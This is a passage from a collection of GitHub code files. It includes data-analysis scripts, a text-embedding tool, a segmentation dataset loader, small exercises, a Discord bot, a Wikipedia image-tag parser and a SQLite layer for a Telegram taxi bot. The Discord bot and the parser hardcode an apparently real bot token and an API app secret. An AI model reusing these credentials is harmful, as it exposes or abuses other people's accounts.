np.where(podaci3['absences']>=10,1,0)\npodaci3[\"Brojac\"]=1\npodaci4=podaci3[[\"Ocjena_10\", \"Puno_izostanaka\", \"Brojac\"]]\ntabela=pd.pivot_table(\n podaci4,\n index=[\"Ocjena_10\"],\n columns=[\"Puno_izostanaka\"],\n values=\"Brojac\",\n aggfunc=np.size \n )\nP_A=(35+3)/(276+35+32+3)\nprint(P_A)\nP_B=(32+3)/(276+35+32+3)\nprint(P_B)\nP_AB=3/(276+35+32+3)\nprint(P_AB)\nP_A_B=P_AB/P_B\nprint(P_A_B)\nE2= sum(podaci3['absences'])/n\nvar2= sum((podaci3['absences']-E2)**2)/(n-1)\nsd2=math.sqrt(var2)\n\n\n#histogram\nn1=100000\nX=random.normal(E2,var2, size=n1)\nsns.distplot(X, hist=True, kde=False)\nplt.grid()\nplt.title(\" Normal distribution\")\nplt.xlabel(\"x\")\nplt.ylabel(\"fx(x)\")\nplt.show()\nk=podaci3[\"Ocjena_10\"]\nplt.hist(k)\nplt.xlabel(\"1 - students who got a grade of 10\")\nplt.ylabel(\"Number of students\")\nplt.grid()\n\nplt.figure(2)\nk1=P_A_B\nplt.hist(k1)\nplt.title(\"Probability that a student got a grade of 10 in the course given that they missed 10 or more hours of lectures\")\nplt.grid()\n\n","repo_name":"azrazic/Statistical-theory-","sub_path":"kod.py","file_name":"kod.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9130457973","text":"\"\"\"\nEmbed each row of a `.jsonl` file using a HuggingFace model and save the embeddings.\n\nAuthors: The Meerkat Team (Karan Goel, Sabri Eyuboglu, Arjun Desai)\nLicense: Apache License 2.0\n\"\"\"\nimport os\nfrom argparse import ArgumentParser\n\nimport numpy as np\nimport pyarrow as pa\nimport pyarrow.compute as pc\nimport pyarrow.json\nimport torch\nimport torch.nn.functional as F\nfrom rich import print\nfrom tqdm.auto import tqdm\nfrom transformers import AutoModel, AutoTokenizer\n\nimport meerkat as mk\n\n\nclass TruncatedDataset:\n def __init__(\n self,\n df: mk.DataFrame,\n tokenizer: AutoTokenizer,\n chunk_size: int,\n ):\n self.df = df\n self.tokenizer = tokenizer\n self.chunk_size = chunk_size\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n data = self.df[idx]\n tokenized = self.tokenizer(\n data[\"text\"],\n pad_to_multiple_of=self.chunk_size,\n padding=True,\n )\n return {\n \"input_ids\": torch.tensor(tokenized[\"input_ids\"][: self.chunk_size]),\n \"attention_mask\": torch.tensor(\n tokenized[\"attention_mask\"][: self.chunk_size]\n ),\n \"doc_id\": data[\"id\"],\n \"chunk_id\": 0,\n }\n\n\ndef create_model_and_tokenizer(\n model_name: str,\n cache_dir: str,\n):\n print(\"Loading tokenizer...\")\n 
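# Note (added commentary, not in the original): for BERT-style checkpoints such as\n # all-MiniLM-L6-v2 the vocabulary already contains [PAD], so the add_special_tokens call\n # below adds nothing new; a tokenizer that genuinely lacked a pad token would also need\n # model.resize_token_embeddings(len(tokenizer)) before use.\n 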
tokenizer = AutoTokenizer.from_pretrained(model_name, cache_dir=cache_dir)\n tokenizer.add_special_tokens({\"pad_token\": \"[PAD]\"})\n print(\"Loading model...\")\n model = AutoModel.from_pretrained(model_name, cache_dir=cache_dir).cuda()\n\n return model, tokenizer\n\n\ndef prepare(feature_dir: str, savepath: str):\n if not os.path.exists(feature_dir):\n os.makedirs(feature_dir)\n\n if os.path.exists(savepath):\n exit()\n\n\ndef load_dataframe(path):\n print(\"Loading dataframe...\")\n # Load in the JSON.\n df = mk.from_json(\n path,\n lines=True,\n backend=\"arrow\",\n read_options=pa.json.ReadOptions(**{\"block_size\": 10 << 20}),\n )\n\n if \"meta\" in df.columns:\n struct_array = df[\"meta\"].data\n result = {}\n for field_index in range(struct_array.type.num_fields):\n field = struct_array.type.field(field_index)\n result[field.name] = mk.ArrowScalarColumn(\n pc.struct_field(struct_array, field.name)\n )\n meta_df = mk.DataFrame(result)\n else:\n meta_df = mk.DataFrame()\n\n if \"id\" in meta_df.columns:\n df[\"id\"] = meta_df[\"id\"]\n elif \"arxiv_id\" in meta_df.columns:\n df[\"id\"] = meta_df[\"arxiv_id\"]\n else:\n try:\n df[\"id\"] = meta_df[\"pkey\"]\n except:\n df.create_primary_key(\"id\")\n df = df.set_primary_key(\"id\")\n\n try:\n df = df.drop(\"pkey\")\n except ValueError:\n pass\n\n assert set(df.columns) >= set(\n [\"id\", \"text\"]\n ), f\"Unexpected columns: {set(df.columns)}\"\n return df\n\n\ndef create_dataloader(\n filepath: str,\n tokenizer: AutoTokenizer,\n chunk_size: int,\n batch_size: int,\n num_workers: int,\n):\n dataset = TruncatedDataset(\n load_dataframe(filepath),\n tokenizer,\n chunk_size=chunk_size,\n )\n return torch.utils.data.DataLoader(\n dataset,\n shuffle=False,\n batch_size=batch_size,\n num_workers=num_workers,\n )\n\n\n@torch.no_grad()\ndef extract_features(\n model: torch.nn.Module,\n input_ids: torch.Tensor,\n attention_mask: torch.Tensor,\n):\n \"\"\"Extract features from the model.\"\"\"\n # Extract features from the model\n attention_mask = attention_mask.cuda()\n outputs = model.forward(input_ids.cuda(), attention_mask=attention_mask)[0]\n\n # Use the attention mask to average the output vectors.\n outputs = outputs.cpu()\n attention_mask = attention_mask.cpu()\n features = (outputs * attention_mask.unsqueeze(2)).sum(1) / attention_mask.sum(\n 1\n ).unsqueeze(1).cpu()\n\n # Normalize embeddings\n features = F.normalize(features, p=2, dim=1).numpy()\n\n return features\n\n\ndef run_feature_extraction(\n model: torch.nn.Module,\n dataloader: torch.utils.data.DataLoader,\n):\n print(\"Feature extraction...\")\n storage = []\n for batch in tqdm(dataloader):\n features = extract_features(model, batch[\"input_ids\"], batch[\"attention_mask\"])\n storage.append(features)\n\n # Save the features to disk.\n return np.concatenate(storage, axis=0).reshape(-1, 384)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--gpu\", type=int, default=0)\n parser.add_argument(\"--filepath\", type=str)\n parser.add_argument(\"--num_workers\", type=int, default=16)\n parser.add_argument(\"--batch_size\", type=int, default=8)\n parser.add_argument(\"--chunk_size\", type=int, default=256)\n parser.add_argument(\n \"--model_name\",\n type=str,\n default=\"sentence-transformers/all-MiniLM-L6-v2\",\n )\n parser.add_argument(\"--cache_dir\", type=str, default=\"/home/karan/models/\")\n parser.add_argument(\n \"--feature_dir\",\n type=str,\n default=f\"/home/karan/data/pyjama/features/\",\n )\n\n args = parser.parse_args()\n 
feature_dir = os.path.join(args.feature_dir, args.model_name)\n\n CUDA_VISIBLE_DEVICES = args.gpu\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(CUDA_VISIBLE_DEVICES)\n\n # Get num_gpus on this machine.\n num_gpus = torch.cuda.device_count()\n\n filepath = args.filepath\n filename = os.path.basename(filepath)\n savepath = os.path.join(feature_dir, filename.replace(\".jsonl\", \".npy\"))\n prepare(feature_dir, savepath)\n\n model, tokenizer = create_model_and_tokenizer(args.model_name, args.cache_dir)\n dataloader = create_dataloader(\n filepath,\n tokenizer,\n chunk_size=args.chunk_size,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n )\n\n features = run_feature_extraction(model, dataloader)\n np.save(savepath, features)\n print(\"Done.\")\n","repo_name":"togethercomputer/RedPajama-Data","sub_path":"viz/embed_jsonl.py","file_name":"embed_jsonl.py","file_ext":"py","file_size_in_byte":6047,"program_lang":"python","lang":"en","doc_type":"code","stars":3920,"dataset":"github-code","pt":"34"} +{"seq_id":"8359928865","text":"\nimport torch\nimport numpy as np\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\nfrom PIL import Image, ImageFile\nimport segmentation.utils.custom_transforms as tr\n\nVOC_COLORMAP = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0],\n [0, 0, 128], [128, 0, 128], [0, 128, 128], [128, 128, 128],\n [64, 0, 0], [192, 0, 0], [64, 128, 0], [192, 128, 0],\n [64, 0, 128], [192, 0, 128], [64, 128, 128], [192, 128, 128],\n [0, 64, 0], [128, 64, 0], [0, 192, 0], [128, 192, 0],\n [0, 64, 128]]\n\nVOC_CLASSES = ['background', 'aeroplane', 'bicycle', 'bird', 'boat',\n 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',\n 'diningtable', 'dog', 'horse', 'motorbike', 'person',\n 'potted plant', 'sheep', 'sofa', 'train', 'tv/monitor']\n\nclass VOCSegmentation(Dataset):\n def __init__(self, dataset_root, args, split):\n \"\"\"\n crop_size: (h, w)\n \"\"\"\n self.split = split\n self.dataset_root = dataset_root\n self.args = args \n self.id_file = '%s/ImageSets/Segmentation/%s' % (dataset_root, 'trainval.txt' if self.split=='train' else 'test.txt')\n with open(self.id_file, 'r') as f:\n self.img_ids = f.read().split() # 拆分成一个个名字组成list\n self.colormap2label = np.zeros(256**3, dtype=np.uint8) # torch.Size([16777216])\n for i, colormap in enumerate(VOC_COLORMAP):\n # 每个通道的进制是256,这样可以保证每个 rgb 对应一个下标 i\n self.colormap2label[(colormap[0] * 256 + colormap[1]) * 256 + colormap[2]] = i\n\n def filter(self, imgs):\n return [img for img in imgs if (\n img.size[1] >= self.crop_size[0] and img.size[0] >= self.crop_size[1])]\n\n def __getitem__(self, idx):\n self.img_id = self.img_ids[idx]\n _image, mask_image = self._read_voc_images()\n _target = self._voc_label_indices(mask_image)\n _target = Image.fromarray(_target)\n sample = {'image': _image, 'label': _target}\n if self.split == \"train\":\n return self._transform_train(sample)\n elif self.split == 'val':\n return self._transform_val(sample)\n \n def __len__(self):\n return len(self.img_ids)\n\n\n def _read_voc_images(self):\n image= Image.open('%s/JPEGImages/%s.jpg' % (self.dataset_root, self.img_id)).convert(\"RGB\")\n mask_image = Image.open('%s/SegmentationClass/%s.png' % (self.dataset_root, self.img_id)).convert(\"RGB\")\n return image, mask_image # PIL image 0-255\n def _voc_label_indices(self, mask_colormap ):\n mask_colormap = np.array(mask_colormap.convert(\"RGB\")).astype('int32')\n idx = ((mask_colormap[:, :, 0] * 256 + mask_colormap[:, :, 1]) * 256 + mask_colormap[:, :, 2]) \n return 
self.colormap2label[idx] # map each colormap value to the index computed into colormap2label\n\n\n def _transform_train(self, sample):\n composed_transforms = transforms.Compose([\n tr.RandomHorizontalFlip(),\n tr.RandomScaleCrop(base_size=self.args.data.BASE_SIZE, crop_size=self.args.data.CROP_SIZE),\n tr.RandomGaussianBlur(),\n tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n tr.ToTensor()])\n\n return composed_transforms(sample)\n\n def _transform_val(self, sample):\n ori_size = sample['image'].size\n composed_transforms = transforms.Compose([\n \n tr.FixScaleCrop(crop_size = self.args.data.CROP_SIZE),\n tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n tr.ToTensor()])\n\n return composed_transforms(sample), ori_size","repo_name":"yannqi/CV-Dataset-Dataloader-Pytorch","sub_path":"segmentation/VOC/voc.py","file_name":"voc.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"72044892259","text":"'''TASK 2 (ZADANIE 2)'''\r\n# A household-appliance store offers installment sales. Write a program\r\n# that calculates the monthly installment for the purchased equipment. The\r\n# program's input data are:\r\n# the price of the goods (from 100 PLN to 10,000 PLN),\r\n# the number of installments (from 6 to 48).\r\n# The loan interest rate depends on the number of installments:\r\n# for 6-12 it is 2.5%,\r\n# for 13-24 it is 5%,\r\n# for 25-48 it is 10%.\r\n# The calculated monthly installment should also include the interest. The\r\n# program should check whether the given data fall within the ranges defined\r\n# above and, in case of an error, ask the user to enter the data again.\r\n\r\n'''SOLUTION (ROZWIĄZANIE)'''\r\n# Function\r\n# Takes data from the user\r\n# Guards against values outside the specified ranges\r\ndef load_data(from_min, to_max, name):\r\n data = int(input(f\"{name} - enter a value: \"))\r\n while not from_min <= data <= to_max:\r\n data = int(input(f\"{name} - value out of range. Enter it again: \"))\r\n return data\r\n\r\n#Input\r\ncena_towaru = load_data(100, 10000, \"Item price\")\r\nliczba_rat = load_data(6, 48, \"Number of installments\")\r\n\r\nif 6 <= liczba_rat <= 12:\r\n oprocentowanie = 0.025\r\nelif liczba_rat <= 24:\r\n oprocentowanie = 0.05\r\nelse:\r\n oprocentowanie = 0.1\r\n\r\n#Output\r\nmies_rata = (cena_towaru + (cena_towaru * oprocentowanie)) / liczba_rat\r\noprocentowanie *= 100\r\n\r\nprint(f\"\\nPARAMETERS \\n- Item price: {cena_towaru:.2f} PLN\\n- Number of installments: {liczba_rat} \\n- Interest rate: {oprocentowanie}% \\n- Monthly installment: {mies_rata:.2f} PLN\")\r\n","repo_name":"jarsonX/Learning_Python","sub_path":"_exercises/beginners/in-polish/Zadanie-000002.py","file_name":"Zadanie-000002.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"38375995272","text":"from sys import stdin\n\nn = int(stdin.readline())\n\nfor _ in range(n):\n vstring = list(stdin.readline())\n stack = []\n for v in vstring:\n if v == '(':\n stack.append(v)\n elif v == ')':\n if len(stack) != 0:\n stack.pop()\n else:\n stack.append('x')\n break\n\n if len(stack) != 0:\n print('NO')\n else:\n print('YES')\n","repo_name":"bong7233/BOJ","sub_path":"백준/Silver/9012. 
괄호/괄호.py","file_name":"괄호.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30653266200","text":"import json\nimport copy\n\nDEFAULT_SECURITY_HEADERS = {\n 'Strict-Transport-Security' : 'max-age=31540000',\n 'X-Frame-Options': 'DENY',\n 'X-XSS-Protection': '1; mode=block',\n 'X-Content-Type-Options': 'nosniff',\n 'Access-Control-Allow-Headers': 'Content-Type,Authorization,X-Amz-Date,X-Api-Key,X-Amz-Security-Token',\n 'Access-Control-Allow-Methods': 'DELETE,GET,HEAD,OPTIONS,PATCH,POST,PUT',\n 'Access-Control-Allow-Origin': '*',\n}\n\n\ndef create_response_obj(status_code, body):\n headers = copy.deepcopy(DEFAULT_SECURITY_HEADERS)\n headers['Content-Type'] = 'application/json'\n\n return {\n 'statusCode': status_code,\n 'body': json.dumps(body, default=str),\n 'headers': headers\n }\n","repo_name":"aws-samples/deep-learning-web-app","sub_path":"backend/training-pipeline/functions/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"5206261637","text":"\"\"\"\n\n\"\"\"\n\n\ndef chef_and_game(data):\n for i in range(0, len(data)):\n for j in range(0, len(data)):\n if data[i] > data[j]:\n data[i] = data[i] - data[j]\n\n return data[0]\n\n\nif __name__ == '__main__':\n t = int(input())\n for i in range(0, t):\n size = input()\n arr = [int(i) for i in input().split()][0:int(size)]\n print(chef_and_game(arr))","repo_name":"Harish-Muralidhar/Benchmark_Test_To_Analyze_Performance_Of_Code_Generating_Foundation_Models","sub_path":"generated_codes/experiment_c/parameter_set_1/five_samples/python_files/115_3.py","file_name":"115_3.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33152553275","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 1 16:01:07 2019\n\n@author: Administrator\n\"\"\"\n\nimport tensorflow as tf\nglobal_step=tf.Variable(0,trainable=False)\ninitial_lr=0.1\nlr=tf.train.exponential_decay(initial_lr,global_step=global_step,decay_steps=10,decay_rate=0.9)\nopt=tf.train.GradientDescentOptimizer(lr)\nadd_global=global_step.assign_add(1) # define an op that increments global_step by 1 to count steps\nwith tf.Session() as sess:\n tf.global_variables_initializer().run()\n print(sess.run(lr))\n for i in range(20):\n g,rate=sess.run([add_global,lr])\n print(g,rate)","repo_name":"librauee/DeepLearning","sub_path":"tensorflow_learning/lr_decay.py","file_name":"lr_decay.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"34"} +{"seq_id":"24386168894","text":"import discord\nfrom discord.ext import commands\nimport asyncio\n\nTOKEN = 'NTc5MDA0Njg3NjQzMzEyMTQ4.XN72Jw.6m1nn6vTn78m8ugd4SEOpa_eUaM'\n\n# The character used to call commands\nclient = commands.Bot(command_prefix='!')\nclient.remove_command('help')\n\n'''Names of the cogs.\nMake sure to add your cog to this list for it to work properly'''\nextensions = ['basic', 'faq', 'roadmap', 'help', 'admin', 'challenges']\nextensions = ['cogs.' 
","repo_name":"librauee/DeepLearning","sub_path":"tensorflow_learning/lr_decay.py","file_name":"lr_decay.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"34"} +{"seq_id":"24386168894","text":"import discord\nfrom discord.ext import commands\nimport asyncio\n\nTOKEN = 'NTc5MDA0Njg3NjQzMzEyMTQ4.XN72Jw.6m1nn6vTn78m8ugd4SEOpa_eUaM'\n\n# The character used to call commands\nclient = commands.Bot(command_prefix='!')\nclient.remove_command('help')\n\n'''Names of the cogs.\nMake sure to add your cog to this list for it to work properly'''\nextensions = ['basic', 'faq', 'roadmap', 'help', 'admin', 'challenges']\nextensions = ['cogs.' + name for name in extensions]\n\nif __name__ == '__main__':\n    # try/except inside the loop so one broken cog does not stop the rest from loading\n    for extension in extensions:\n        try:\n            client.load_extension(extension)\n            print(f'Loaded {extension}')\n        except Exception as e:\n            print(f'{extension} cannot be loaded: {e}')\n\n\n@client.event\nasync def on_ready():\n    print(\n        str(client.user.name)\n        + \" is online\\nVersion: \"\n        + discord.__version__\n    )\n    print(\"------\")\n\n\nclient.run(TOKEN)\n","repo_name":"smallest-cock/python3-practice-projects","sub_path":"Discord bot/worldofpythonbot/Bot/World_of_Python_Bot_Core.py","file_name":"World_of_Python_Bot_Core.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"72886757219","text":"from ClarifaiParse import ClarifaiParse\nimport json\nimport wikipedia\nfrom bs4 import BeautifulSoup\nimport httplib2\n\nclass WikiParse:\n    def __init__(self):\n        app_id = \"aoaEzeM8d6fiL2L1eX--OtjXFAaPe_CDo6zFvEJD\"\n        app_secret = \"fjhnJKSdHcZJACroOvCCoNf4tgi9YlOQpi52z-Pb\"\n        self.c = ClarifaiParse(app_id, app_secret)\n        self.rank = [\"domain\", \"kingdom\", \"phylum\",\n                    \"class\", \"subclass\", \"superorder\",\n                    \"order\", \"suborder\", \"family\",\n                    \"subfamily\", \"genus\", \"species\"]\n\n    def linnean_values(self, table):\n        t = str(table).lower()\n        for i in range(len(self.rank)-1, -1, -1):\n            if self.rank[i] in t:\n                print(self.rank[i])\n                return i\n\n        return -1\n\n    def linnean_table(self, url, http):\n        status, response = http.request(url)\n        soup = BeautifulSoup(response, \"lxml\")\n        table = soup.find(\"table\", {\"class\":\"infobox biota\"})\n        return table\n\n    def get_matches(self, name, max_count=3):\n        matches = []\n        http = httplib2.Http()\n\n        i = 0\n        for result in self.c.parse(name):\n            if i >= max_count: break\n            name = result[\"tag\"]\n\n            try:\n                wiki_response = wikipedia.WikipediaPage(name)\n                table = self.linnean_table(wiki_response.url, http)\n                if table != None:\n                    linnean = self.linnean_values(table)\n                    result[\"linnean\"] = linnean\n                    result[\"summary\"] = wiki_response.summary\n\n                    print(name, linnean, \"is a real and relevant article\")\n                    matches.append(result)\n                    i += 1\n\n            except wikipedia.exceptions.DisambiguationError as e:\n                continue\n            except wikipedia.exceptions.PageError as e:\n                print(name, \"is not a real article\")\n                continue\n\n        matches = sorted(matches, key=lambda k: -k[\"linnean\"])\n        return json.dumps(matches)\n\n\nif __name__ == \"__main__\":\n    w = WikiParse()\n    url = \"http://pngimg.com/upload/butterfly_PNG1037.png\"\n    matches = w.get_matches(url)\n\n","repo_name":"yukseltron/animadex","sub_path":"wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"28875991401","text":"import datetime\nimport sqlite3\n\nimport config\n\nconnection = sqlite3.connect(\"database/database.db\", check_same_thread=False)\n\n\ndef get_step(manager_id: int) -> int:\n    \"\"\"\n    Returns the bot interaction step for a manager\n\n    :param manager_id: the manager's Telegram ID\n    \"\"\"\n\n    cursor = connection.cursor()\n\n    request = \"SELECT step FROM managers WHERE telegram_id=?\"\n    result = cursor.execute(request, (manager_id,)).fetchone()\n\n    return result[0]\n\n\n
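# Illustrative call flow (12345 is a made-up Telegram ID, not real data):\n# set_step(12345, 2) stores the manager's step, and a later handler can branch\n# on get_step(12345) to pick the next reply.\n\n\n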
def set_step(manager_id: int, step: int):\n    \"\"\"\n    Updates the bot interaction step for a manager\n\n    :param manager_id: the manager's Telegram ID\n    :param step: the bot interaction step\n    \"\"\"\n\n    cursor = connection.cursor()\n\n    request = \"UPDATE managers SET step=? WHERE telegram_id=?\"\n    cursor.execute(request, (step, manager_id))\n    connection.commit()\n\n\ndef add_user(manager_id: int):\n    \"\"\"\n    Adds a manager to the database\n\n    :param manager_id: the manager's Telegram ID\n    \"\"\"\n\n    cursor = connection.cursor()\n\n    request = \"INSERT INTO managers(telegram_id) VALUES (?)\"\n    cursor.execute(request, (manager_id,))\n    connection.commit()\n\n\ndef delete_not_public_trip():\n    \"\"\"\n    Deletes the unpublished trip\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"DELETE FROM trips WHERE state=?\"\n    cursor.execute(request, (config.TripsStates.IN_PROCESS,))\n    connection.commit()\n\n\ndef create_trip(departure_point: str):\n    \"\"\"\n    Creates a new trip\n\n    :param departure_point: departure point\n    \"\"\"\n\n    creation_date = datetime.datetime.now()\n\n    cursor = connection.cursor()\n    request = \"INSERT INTO trips(departure_point, creation_date, state) VALUES(?, ?, ?)\"\n    cursor.execute(request, (departure_point, creation_date, config.TripsStates.IN_PROCESS))\n    connection.commit()\n\n\ndef get_not_public_trip():\n    \"\"\"\n    Returns the ID of the unpublished trip\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"SELECT id FROM trips WHERE state=?\"\n    result = cursor.execute(request, (config.TripsStates.IN_PROCESS,)).fetchone()\n    return result[0] if result else result\n\n\ndef set_arrival_point(trip_id: int, arrival_point: str):\n    \"\"\"\n    Sets the arrival point\n\n    :param trip_id: trip ID\n    :param arrival_point: arrival point\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"UPDATE trips SET arrival_point=? WHERE id=?\"\n    cursor.execute(request, (arrival_point, trip_id))\n    connection.commit()\n\n\ndef set_time_for_trip(trip_id: int, trip_time: str):\n    \"\"\"\n    Sets the trip time\n\n    :param trip_id: trip ID\n    :param trip_time: trip time\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"UPDATE trips SET time=? WHERE id=?\"\n    cursor.execute(request, (trip_time, trip_id))\n    connection.commit()\n\n\ndef set_price_for_trip(trip_id: int, trip_price: int):\n    \"\"\"\n    Sets the trip price\n\n    :param trip_id: trip ID\n    :param trip_price: trip price\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"UPDATE trips SET price=? WHERE id=?\"\n    cursor.execute(request, (trip_price, trip_id))\n    connection.commit()\n\n\n
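# Sketch of the intended sequencing (all values made up for illustration):\n# create_trip('Lenin St. 1') inserts an IN_PROCESS row, get_not_public_trip()\n# returns its id, then set_arrival_point / set_time_for_trip / set_price_for_trip\n# fill in the fields before publish_trip() makes the trip visible.\n\n\n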
def publish_trip(trip_id: int):\n    \"\"\"\n    Publishes the trip\n\n    :param trip_id: trip ID\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"UPDATE trips SET state=? WHERE id=?\"\n    cursor.execute(request, (config.TripsStates.PUBLIC, trip_id))\n    connection.commit()\n\n\ndef get_info_about_trip(trip_id: int):\n    \"\"\"\n    Returns all information about the trip\n\n    :param trip_id: trip ID\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"SELECT id, departure_point, arrival_point, time, price, creation_date, state, additional_info FROM trips WHERE id=?\"\n    result = cursor.execute(request, (trip_id,)).fetchone()\n    return {\n        \"id\": trip_id,\n        \"departure_point\": result[1],\n        \"arrival_point\": result[2],\n        \"time\": result[3],\n        \"price\": result[4],\n        \"creation_date\": result[5],\n        \"state\": result[6],\n        \"additional_info\": result[7]\n    }\n\n\ndef check_if_valid_trip_id(trip_id: int) -> bool:\n    \"\"\"\n    Checks whether a trip with this ID exists in the database\n\n    :param trip_id: trip ID\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"SELECT id FROM trips WHERE id=?\"\n    result = cursor.execute(request, (trip_id,)).fetchone()\n    return True if result else False\n\n\ndef get_response_answer_for_trip(trip_id: int, driver_id: int):\n    \"\"\"\n    Returns the driver's response to the order\n\n    :param trip_id: trip request ID\n    :param driver_id: the driver's Telegram ID\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"SELECT response_type FROM responses WHERE trip_id=? AND driver_id=?\"\n    result = cursor.execute(request, (trip_id, driver_id)).fetchone()\n    return result[0] if result else result\n\n\ndef create_trip_response(trip_id: int, driver_id: int, response_type: int):\n    \"\"\"\n    Adds a driver's response to a trip to the database\n\n    :param trip_id: trip ID\n    :param driver_id: the driver's Telegram ID\n    :param response_type: response type: accepted or declined\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"INSERT INTO responses(trip_id, driver_id, response_type) VALUES(?, ?, ?)\"\n    cursor.execute(request, (trip_id, driver_id, response_type))\n    connection.commit()\n\n\ndef set_trip_state(trip_id: int, state: int):\n    \"\"\"\n    Sets the trip state\n\n    :param trip_id: trip ID\n    :param state: trip state\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"UPDATE trips SET state=? WHERE id=?\"\n    cursor.execute(request, (state, trip_id))\n    connection.commit()\n\n\n
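# For reference, get_info_about_trip returns a dict of this shape (values\n# below are illustrative, not real rows):\n# {'id': 7, 'departure_point': 'A', 'arrival_point': 'B', 'time': '14:00',\n#  'price': 500, 'creation_date': '2023-01-01 12:00:00', 'state': 1, 'additional_info': None}\n\n\n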
def set_additional_info(trip_id: int, additional_info: str):\n    \"\"\"\n    Sets additional information about the trip\n\n    :param trip_id: trip ID\n    :param additional_info: additional information\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"UPDATE trips SET additional_info=? WHERE id=?\"\n    cursor.execute(request, (additional_info, trip_id))\n    connection.commit()\n\n\ndef get_all_trips():\n    \"\"\"\n    Returns all trips\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"SELECT departure_point, arrival_point, time, price, additional_info, state FROM trips\"\n    result = cursor.execute(request).fetchall()\n    return result\n\n\ndef check_if_driver(driver_id: int) -> bool:\n    \"\"\"\n    Checks whether the driver exists in the database\n\n    :param driver_id: the driver's Telegram ID\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"SELECT driver_id FROM drivers WHERE driver_id=?\"\n    result = cursor.execute(request, (driver_id,)).fetchone()\n    return True if result else False\n\n\ndef add_driver(driver_id: int, driver_full_name: str):\n    \"\"\"\n    Adds a driver to the database\n\n    :param driver_id: the driver's Telegram ID\n    :param driver_full_name: the driver's full name\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"INSERT INTO drivers(driver_id, driver_full_name) VALUES(?, ?)\"\n    cursor.execute(request, (driver_id, driver_full_name))\n    connection.commit()\n\n\ndef update_drivers_full_name(driver_id: int, driver_full_name: str):\n    \"\"\"\n    Updates the driver's name\n\n    :param driver_id: the driver's Telegram ID\n    :param driver_full_name: the driver's full name\n    \"\"\"\n\n    cursor = connection.cursor()\n    request = \"UPDATE drivers SET driver_full_name=? WHERE driver_id=?\"\n    cursor.execute(request, (driver_full_name, driver_id))\n    connection.commit()
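\n\n\n# Typical registration sketch (made-up ID and name, for illustration only):\n# if not check_if_driver(111): add_driver(111, 'Ivan Ivanov'); a later rename\n# goes through update_drivers_full_name(111, 'Ivan I. Ivanov').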
","repo_name":"aeroboss13/driver_bot.py","sub_path":"database/db_work.py","file_name":"db_work.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"38228777039","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom decimal import Decimal\r\nfor i in range (1,21):\r\n\tj = int(i*5)\r\n\tfor target in ['dd','lnm']:\r\n\t\tx, y = np.meshgrid(np.linspace(0, 5, 6),np.linspace(0, 10, 11))\r\n\t\tz = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['AUC'].values\r\n\t\tfor item in range (0,len(np.array(z))):\r\n\t\t\tif np.array(z)[item] == np.max(np.array(z)):\r\n\t\t\t\tbestAUC = round(np.array(z)[item],4)\r\n\t\t\t\tbestCLASS = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['Classifier_Method'][item]\r\n\t\t\t\tbestFS = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['Subset'][item]\r\n\t\t\t\tbestsp = round(np.array(pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['Specificity'].values)[item],4)\r\n\t\t\t\tbestse = round(np.array(pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['Sensitivity'].values)[item],4)\r\n\t\t\t\tbesttp = 